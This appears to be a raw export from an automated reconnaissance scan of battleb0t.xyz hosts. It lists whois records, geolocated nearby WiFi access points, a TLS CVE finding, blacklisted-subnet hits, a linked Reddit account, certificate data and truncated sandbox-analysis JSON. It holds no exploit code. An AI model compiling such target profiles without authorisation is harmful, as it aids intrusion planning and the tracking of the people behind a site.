0===u?"":u,y=["p",0,37],2)],f)[29](y[2],e[y[1]],e[1])+u),z.u).set(y[0],w),wx.y()).get(),z.u.set("k",v[7](16,e[2],r)),z&&z.u.set("id",z),z).tostring()},u).prototype.h1=function(){},u.prototype.ia=function(w,z){(((this.su[(z=["qu",30,"sq"],z)[0]](w),this).mx[z[0]](w),this).rr[z[0]](w),this)[z[2]][z[0]](w),this.bi[z[0]](w),v[z[1]](9," [Source: recaptcha__en_1_.js]\n Observed email domain:"z,u){(this[(((((td.prototype.sw[z=["undo-button-holder","image-button-holder","verify-button-holder"],u=["call",1,"sq"],u[0]](this,w),this.su).render(c[41](68,this,"reload-button-holder")),this.mx.render(c[41](52,this,"audio-button-holder")),this.rr).render(c[41](53,this,z[u[1]])),this.bi).render(c[41](84,this,"help-button-holder")),this.xv).render(c[41](68,this,z[0])),f[13](8,!1,this.xv.g()),u)[2]].render(c[41](68,this,z[2])),this).ee?f[13](22,!1,this.mx.g()):f[13](20,!1,this.rr.g())},u).prototype.nu=" [S | 185.199.110.153 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | DaltonInt (Net ID: 00:0A:04:99:14:E2) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:54:21 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | http://vscode.battleb0t.xyz | vscode.battleb0t.xyz |
| 2023-05-12 03:09:45 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 133.97.148.34.bc.googleusercontent.com | 34.148.97.133 |
| 2023-05-12 02:54:20 | Web Content Type | No | Web Spider | 0 | 0 | 4 | 0 | None | text/css;charset=utf-8 | https://funny.battleb0t.xyz/gallery.css |
| 2023-05-12 02:46:50 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 34.148.97.127 |
| 2023-05-12 03:36:17 | Blacklisted IP on Same Subnet | Yes | DroneBL | 0 | 0 | 4 | 0 | None | dronebl.org - Brute force attackers (45.131.109.177) | 45.131.109.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | tom1 (Net ID: 00:06:25:9C:ED:D2) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:12:11 | Co-Hosted Site - Domain Whois | No | Whois | 2 | 0 | 3 | 0 | None | Domain Name: ACILACIKVETERINER.COM
Registry Domain ID: 2652209212_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.nicproxy.com
Registrar URL: http://https://nicproxy.com/
Updated Date: 2023-04-01T13:07:55Z
Creation Date: 2021-11-02T23:11:03Z
Registry Expiry Date: 2023-11-02T23:11:03Z
Registrar: Nics Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90 212 213 2963
Domain Status: ok https://icann.org/epp#ok
Name Server: NSC1.KEYUBU.NET
Name Server: NSC2.KEYUBU.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:11:50Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: ACILACIKVETERINER.COM
Registry Domain ID : 2652209212_DOMAIN_COM-VRSN
Registrar WHOIS Server : whois.nicproxy.com
Registrar URL: http://www.nicproxy.com
Updated Date: 2023-04-01T12:50:32Z
Creation Date: 2021-11-02T23:11:03Z
Registrar Registration Expiration Date: 2023-11-02T23:11:03Z
Registrar: NICS Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90.2122132963
Reseller: CIZGI TELEKOMUNIKASYON A.S - NATRO
Domain Status: ok http://www.icann.org/epp#OK
Registry Registrant ID: CID-Redacted for Privacy
Registrant Name: Redacted for Privacy
Registrant Organization: Redacted for Privacy
Registrant Street: Redacted for Privacy
Registrant City: Elazig
Registrant State / Province: Redacted for Privacy
Registrant Postal Code: Redacted for Privacy
Registrant Country: TR
Registrant Phone: Redacted for Privacy
Registrant Phone Ext: Redacted for Privacy
Registrant Fax: Redacted for Privacy
Registrant Fax Ext: Redacted for Privacy
Registrant Email: https://whoisshelter.nicproxy.com/?d=ACILACIKVETERINER.COM
Registry Admin ID: CID-Redacted for Privacy
Admin Name: Redacted for Privacy
Admin Organization: Redacted for Privacy
Admin Street: Redacted for Privacy
Admin City: Redacted for Privacy
Admin State / Province: Redacted for Privacy
Admin Postal Code: Redacted for Privacy
Admin Country: Redacted for Privacy
Admin Phone: Redacted for Privacy
Admin Phone Ext: Redacted for Privacy
Admin Fax: Redacted for Privacy
Admin Fax Ext: Redacted for Privacy
Admin Email: Redacted for Privacy
Registry Tech ID: CID-Redacted for Privacy
Tech Name: Redacted for Privacy
Tech Organization: Redacted for Privacy
Tech Street: Redacted for Privacy
Tech City: Redacted for Privacy
Tech State / Province: Redacted for Privacy
Tech Postal Code: Redacted for Privacy
Tech Country: Redacted for Privacy
Tech Phone: Redacted for Privacy
Tech Phone Ext: Redacted for Privacy
Tech Fax: Redacted for Privacy
Tech Fax Ext: Redacted for Privacy
Tech Email: Redacted for Privacy
Name Server: NSC1.KEYUBU.NET
Name Server: NSC2.KEYUBU.NET
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T03:12:00Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
IMPORTANT: Port43 will provide the ICANN-required minimum data set per
ICANN Temporary Specification, adopted 04 Jun 2018.
Visit whois.nicproxy.com to look up contact data for domains
not covered by GDPR policy.
!****************************************************************************!
NICS Telekomunikasyon A.S., uluslararasi alan adi kayit otoritesi olan ICANN
onayli bir alan adi kayit firmasidir.
Bu alan adina ait web sitesinin icerigi ya da yayinlanmasiyla hicbir sekilde ilgisi yoktur.
Sadece, ICANN kurallari cercevesinde alan adinin kayit edilmesine aracilik yapmaktadir.
Bu alan adi sahibinin kayit sirasinda verdigi bilgiler yukaridaki gibidir.
NICS Telekomunikasyon A.S., bu bilgilerin dogrulugunu garanti edemez.
Daha fazla bilgi almak icin info [at] nicproxy.com adresine yazabilirsiniz.
!*****************************************************************************!
The data in the WHOIS database of NICS Telekomunikasyon A.S. is provided by
Nics Telekomunikasyon Ltd. for information purposes, and to assist persons in
obtaining information about or related to domain name registration
records. NICS Telekomunikasyon A.S. does not guarantee its accuracy.
By submitting a WHOIS query, you agree that you will use this data
only for lawful purposes and that, under no circumstances, you will
use this data to
1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via E-mail(spam) or
2) enable high volume, automated, electronic processes that apply
to Nics Telekomunikasyon Ltd. or its systems.
Nics Telekomunikasyon Ltd. reserves the right to modify these terms.
By submitting this query, you agree to abide by this policy.
NICProxy Whois Server Ver.1.2.2
| acilacikveteriner.com |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ZyXEL (Net ID: 00:02:CF:DB:DC:87) | 40.2024, 29.0398 |
| 2023-05-12 03:31:30 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 7 | 0 | None | abuse@godaddy.com | Domain Name: AMCODEV.ME
Registry Domain ID: D425500000016166846-AGRS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2023-01-03T11:02:11Z
Creation Date: 2018-01-02T22:12:38Z
Registry Expiry Date: 2024-01-02T22:12:38Z
Registrar Registration Expiration Date:
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Reseller:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Name Server: DNS1.STABLETRANSIT.COM
Name Server: DNS2.STABLETRANSIT.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:11:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by The Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Registry Operator reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Domain Name: amcodev.me
Registry Domain ID: D425500000016166846-AGRS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2023-01-03T11:02:09Z
Creation Date: 2018-01-02T22:12:38Z
Registrar Registration Expiration Date: 2024-01-02T22:12:38Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR434510046
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Registry Admin ID: CR434510262
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Registry Tech ID: CR434510194
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=amcodev.me
Name Server: DNS1.STABLETRANSIT.COM
Name Server: DNS2.STABLETRANSIT.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 03:14:48 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | www.ayhu.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | WSTOCK (Net ID: 00:1C:DF:E5:DC:4B) | 32.8608, -79.9746 |
| 2023-05-12 02:56:05 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 2, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'rfc822-email_part_001.html', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:443"\n "152.199.4.44:443"\n "69.16.175.42:443"\n "142.251.33.106:443"\n "52.85.247.99:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"aadcdn.msftauth.net"\n "code.jquery.com"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_e20_IESQMMUTEX_0_519"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_e20_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_e20_ConnHashTable<3616>_HashTable_Mutex"\n "IsoScope_e20_IESQMMUTEX_0_303"\n "IsoScope_e20_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_e20_IE_EarlyTabStart_0xc4c_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\VERMGMTBlockListFileMutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3616"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3616"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "P79XNZ7Z.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\P79XNZ7Z.txt]- [targetUID: 00000000-00002500]\n Dropped file: "Y54NJROK.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\Y54NJROK.txt]- [targetUID: 00000000-00003616]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab11C5.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1263.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: 00000000-00003616]\n "urlblockindex_1_.bin" has type "data"- [targetUID: 00000000-00003616]\n "arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: 00000000-00003616]\n "jquery-3.1.1.min_1_.js" has type "ASCII text with very long lines"- [targetUID: 00000000-00003616]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002500]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003616]\n "Cab11C5.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab11C5.tmp]- [targetUID: 00000000-00002500]\n "Tar11C6.tmp" has type "data"- Location: [%TEMP%\\Tar11C6.tmp]- [targetUID: 00000000-00002500]\n "ux.converged.login.strings-en.min_szor2ujtsn_b-ik0b744ha2_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: 00000000-00003616]\n "1366x768_1_.jpg" has type "JPEG image data Exif standard: [TIFF image data big-endian direntries=7 orientation=upper-left xresolution=98 yresolution=106 resolutionunit=2 software=Adobe Photoshop CC 2015 (Windows) datetime=2020:08:31 21:49:19] progressive precision 8 1366x768 components 3"- [targetUID: 00000000-00003616]\n "~DF261B847065F69F2A.TMP" has type "data"- Location: [%TEMP%\\~DF261B847065F69F2A.TMP]- [targetUID: 00000000-00003616]\n "~DF24279E1E17C14A0C.TMP" has type "data"- Location: [%TEMP%\\~DF24279E1E17C14A0C.TMP]- [targetUID: 00000000-00003616]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: 00000000-00003616]\n "~DFE39359F0B84D8997.TMP" has type "data"- Location: [%TEMP%\\~DFE39359F0B84D8997.TMP]- [targetUID: 00000000-00003616]\n "_ECCEEC9E-703B-11ED-B14B-080027175B4B_.dat" has type "Composite Document File V2 Document Cannot read short stream"- [targetUID: 00000000-00003616]\n "P79XNZ7Z.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\P79XNZ7Z.txt]- [targetUID: 00000000-00002500]\n "~DF07DA6377032F108B.TMP" has type "data"- Location: [%TEMP%\\~DF07DA6377032F108B.TMP]- [targetUID: 00000000-00003616]\n "Cab1263.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1263.tmp]- [targetUID: 00000000-00002500]\n "RecoveryStore._F85F23EB-7026-11ED-B14B-080027175B4B_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00003616]\n "Y54NJROK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\Y54NJROK.txt]- [targetUID: 00000000-00003616]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Heuristic match: "aadcdn.msftauth.net"\n Heuristic match: "code.jquery.com"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-38', u'name': u'Uses HTTPS for communication', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 7, u'description': u'"HTTPS traffic to 104.196.30.220 on port 443"\n "HTTPS traffic to 152.199.4.44 on port 443"\n "HTTPS traffic to 69.16.175.42 on port 443"\n "HTTPS traffic to 142.251.33.106 on port 443"\n "HTTPS traffic to 52.85.247.99 on port 443"'}], u'threat_level': 0, u'size': 413, u'job_id': u'63867bb52e687907d6210c8b', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'suspicious_identifiers': [], u'attck_id': u'T1573', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Encrypted Channel', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'104.196.30.220', u'152.199.4.44', u'69.16.175.42', u'142.251.33.106', u'52.85.247.99'], u'sha256': u'5991841f0d0b33c05baeab2c866b87b0423a247614eafdffda112de9069a5548', u'sha512': u'73c918827db67a1242b4e24aacbf266560b271eadbf13e6dff0e804c9333cd250d04a691aaf1dc1ed61fb982c698ed098d511a9462a537a9d792cb71690243d8', u'image_file_characteristics': [], u'submissions': [{u'url': No | 104.196.30.220 |
| 2023-05-12 02:45:04 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | cloudwaysapps.com |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SR.Mandant (Net ID: 00:01:21:30:6F:28) | 50.1188, 8.6843 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/favicon.png | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:10:12 | Malicious IP on Same Subnet | Yes | VoIPBL OpenPBX IPs | 0 | 0 | 4 | 0 | None | VOIPBL Publicly Accessible PBX List [64.226.80.0/20]
http://www.voipbl.org/update | 64.226.80.0/20 |
| 2023-05-12 03:01:22 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.206): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:46:53 | Affiliate - Domain Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | cloudflare.net | route3.mx.cloudflare.net |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Reddit (Category: social)
https://www.reddit.com/user/ayshoo | ayshoo |
| 2023-05-12 03:01:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.6): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:25 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:d5:98:ae:2a:84:a2:19:ac:80:9a:6c:74:76:20:f8:3f:d8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:01 2022 GMT
Not After : Feb 15 09:44:00 2023 GMT
Subject: CN=portainer.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c0:b5:e1:c5:d7:75:db:34:03:18:a1:ee:7b:4b:
ea:8e:e7:69:4e:39:85:68:38:67:3d:c1:9a:8b:f3:
bd:cf:17:bb:68:6a:65:cf:4a:a8:76:23:7a:4f:20:
df:84:d1:79:b9:6a:69:1e:44:79:b1:f5:77:a0:d1:
57:7d:30:22:17:73:4d:12:ae:da:6f:17:2f:cc:59:
fc:28:b2:56:e2:d1:04:1e:a5:af:0c:cc:00:03:c9:
be:8b:f2:e1:2a:f3:ee:60:20:15:0b:48:ba:bd:47:
ee:af:b8:94:3e:d3:00:b1:a7:9d:eb:e0:5f:7e:6f:
9e:2f:c5:a5:c8:f8:87:92:71:43:69:60:10:5d:de:
5f:ef:16:13:44:c8:38:e1:ab:bf:d4:ba:c9:63:0e:
71:cd:82:05:39:b6:2b:c7:09:a0:3f:7a:0f:d1:b5:
8c:31:e1:64:fb:3e:7d:9c:f0:15:49:3c:98:f1:98:
8a:de:cb:a1:c8:6f:57:47:ea:69:8f:65:04:e8:bd:
1e:d7:20:58:d9:de:ea:65:82:25:f4:8a:20:52:90:
c5:c4:e3:bf:c3:af:cc:ca:46:be:71:d3:24:c0:85:
69:56:27:39:94:2d:43:65:9d:2f:bb:4d:62:7e:14:
0c:45:91:3c:ec:e1:a2:ae:81:70:73:3d:8e:8c:ef:
5a:48:f8:f8:b4:3f:a5:4e:ca:0b:38:80:5d:df:42:
eb:06:32:21:0b:67:44:bf:df:2c:ae:bd:f6:68:1d:
b6:39:c5:d8:57:bc:5e:76:f0:ee:ab:21:2d:35:69:
74:8a:c4:88:bd:d0:3d:91:05:d0:dd:4e:54:8e:e9:
94:fd:a6:9c:7c:35:94:f3:2c:a0:e6:0f:6f:ec:d7:
06:e0:96:b5:94:ae:64:fd:f9:52:45:cc:c0:54:2c:
ae:a7:51:2d:fb:3c:d9:4c:eb:d6:b7:fe:7c:8d:68:
1d:87:d4:dc:09:38:2e:ee:0d:49:32:4c:2b:08:20:
ff:a0:95:02:0a:01:3f:99:e9:bb:d2:97:db:d5:f5:
7d:97:14:d0:18:c5:3f:cf:31:7b:a7:9c:bf:9d:b3:
23:66:83:9e:eb:d9:48:01:38:6c:db:2f:7b:2d:82:
d4:36:d7:86:9f:0b:de:ef:ab:c4:7c:aa:36:24:d0:
